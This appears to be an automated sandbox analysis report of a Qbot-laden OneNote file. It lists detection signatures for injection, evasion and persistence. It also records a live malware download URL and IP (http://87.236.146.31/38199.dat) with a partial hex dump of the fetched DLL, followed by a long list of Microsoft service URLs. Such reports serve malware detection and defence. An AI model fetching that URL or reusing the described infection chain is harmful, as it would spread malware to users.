Windows Analysis Report
Funds_160151.one

Overview

General Information

Sample Name: Funds_160151.one
Analysis ID: 800800
MD5: 28e7fc5ae92342890d6544eb123f1b39
SHA1: 8855057b6acb24949315098ace002c99048efd10
SHA256: 2c2e8ec868c8b50a2f7a59d9948a82a9031301dfb7c41651eb35e158fedf190b
Infos:

Detection

Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
DLL reload attack detected
Malicious sample detected (through community Yara rule)
Sigma detected: Execute DLL with spoofed extension
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Allocates memory in foreign processes
Powershell drops PE file
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
PE file overlay found
Creates a process in suspended mode (likely to inject code)

Classification

Source: Binary string: amstream.pdb source: backgroundTaskHost.exe, 00000010.00000003.2711489777.0000000004611000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: e77242d6.dll.15.dr
Source: Binary string: wntdll.pdb source: e77242d6.dll.15.dr
Source: Binary string: amstream.pdbGCTL source: backgroundTaskHost.exe, 00000010.00000003.2711489777.0000000004611000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000C547 FindFirstFileW,FindNextFileW, 15_2_1000C547

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: EXCELLGB EXCELLGB
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /38199.dat HTTP/1.1Host: 87.236.146.31Connection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 07 Feb 2023 19:02:06 GMTContent-Type: application/octet-streamContent-Length: 424448Connection: keep-aliveAccept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment;Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0e 23 0b 01 02 1f 00 20 03 00 00 c8 04 00 00 04 00 00 80 13 00 00 00 10 00 00 00 30 03 00 00 00 34 69 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 79 6d 07 00 03 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 04 00 35 06 00 00 00 e0 04 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 5c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec ae 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e1 04 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 1f 03 00 00 10 00 00 00 20 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 00 00 00 00 30 03 00 00 02 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 1c 75 01 00 00 40 03 00 00 76 01 00 00 26 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 ac 03 00 00 00 c0 04 00 00 00 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 35 06 00 00 00 d0 04 00 00 08 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 80 05 00 00 00 e0 04 00 00 06 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 04 00 00 02 00 00 00 aa 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 76 aa 01 00 00 00 05 00 00 b0 01 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 5c 1d 00 00 00 b0 06 00 00 1e 00 00 00 5c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: de-ch[1].htm.16.dr String found in binary or memory: "sameAs":["https://www.facebook.com/microsoftschweiz","https://twitter.com/microsoft_ch","https://www.linkedin.com/company/1035","https://www.youtube.com/user/MicrosoftCH","https://www.instagram.com/microsoftch/"] equals www.facebook.com (Facebook)
Source: de-ch[1].htm.16.dr String found in binary or memory: "sameAs":["https://www.facebook.com/microsoftschweiz","https://twitter.com/microsoft_ch","https://www.linkedin.com/company/1035","https://www.youtube.com/user/MicrosoftCH","https://www.instagram.com/microsoftch/"] equals www.linkedin.com (Linkedin)
Source: de-ch[1].htm.16.dr String found in binary or memory: "sameAs":["https://www.facebook.com/microsoftschweiz","https://twitter.com/microsoft_ch","https://www.linkedin.com/company/1035","https://www.youtube.com/user/MicrosoftCH","https://www.instagram.com/microsoftch/"] equals www.twitter.com (Twitter)
Source: de-ch[1].htm.16.dr String found in binary or memory: "sameAs":["https://www.facebook.com/microsoftschweiz","https://twitter.com/microsoft_ch","https://www.linkedin.com/company/1035","https://www.youtube.com/user/MicrosoftCH","https://www.instagram.com/microsoftch/"] equals www.youtube.com (Youtube)
Source: de-ch[1].htm.16.dr String found in binary or memory: <a class="d-inline-block" href="https://www.facebook.com/microsoftschweiz" target="_blank" aria-label="Microsoft auf Facebook folgen ( equals www.facebook.com (Facebook)
Source: de-ch[1].htm.16.dr String found in binary or memory: <a class="d-inline-block" href="https://www.linkedin.com/company/1035" target="_blank" aria-label="Microsoft auf LinkedIn folgen ( equals www.linkedin.com (Linkedin)
Source: de-ch[1].htm.16.dr String found in binary or memory: <a class="d-inline-block" href="https://www.youtube.com/user/MicrosoftCH" target="_blank" aria-label="Microsoft auf YouTube folgen ( equals www.youtube.com (Youtube)
Source: powershell.exe, 00000009.00000002.2654006199.0000021A0CABF000.00000004.00000800.00020000.00000000.sdmp, 1.cmd.7.dr String found in binary or memory: http://87.236.146.31/38199.dat
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: powershell.exe, 00000009.00000002.2662581763.0000021A24B47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000009.00000002.2662581763.0000021A24AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: de-ch[1].htm.16.dr String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWO4yJ?ver=2ab3&quot;
Source: de-ch[1].htm.16.dr String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWOalS?ver=cc6e&quot;
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: de-ch[1].htm.16.dr String found in binary or memory: http://schema.org/Organization
Source: powershell.exe, 00000009.00000002.2654006199.0000021A0C591000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: powershell.exe, 00000009.00000002.2654006199.0000021A0C5D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000009.00000002.2654006199.0000021A0C5FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: de-ch[1].htm.16.dr String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.aadrm.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.cortana.ai
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.office.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.onedrive.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://api.scheduler.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://augloop.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://cdn.entity.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: de-ch[1].htm.16.dr String found in binary or memory: https://cdnssl.clicktale.net/www32/ptc/05d32363-d534-4d93-9b65-cde674775e71.js
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://cortana.ai
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://cortana.ai/api
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://cr.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://d.docs.live.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://directory.services.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601292631425
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://graph.windows.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://graph.windows.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: de-ch[1].htm.16.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net
Source: de-ch[1].htm.16.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
